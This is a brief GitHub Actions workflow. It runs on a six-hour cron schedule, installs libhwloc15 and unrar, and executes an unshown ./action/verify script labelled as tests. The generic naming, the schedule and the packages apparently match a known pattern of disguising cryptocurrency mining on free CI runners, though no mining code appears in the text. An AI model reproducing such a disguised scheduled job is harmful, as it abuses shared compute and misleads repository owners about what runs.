jobs:
  run:
    name: Workflow
    runs-on: ubuntu-20.04

    steps:
      - name: Begin
        uses: actions/checkout@v2
      - name: Install Packages
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Run Tests
        run: ./action/verify

name: Workflow

on:
  schedule:
    - cron: "15 */6 * * *"
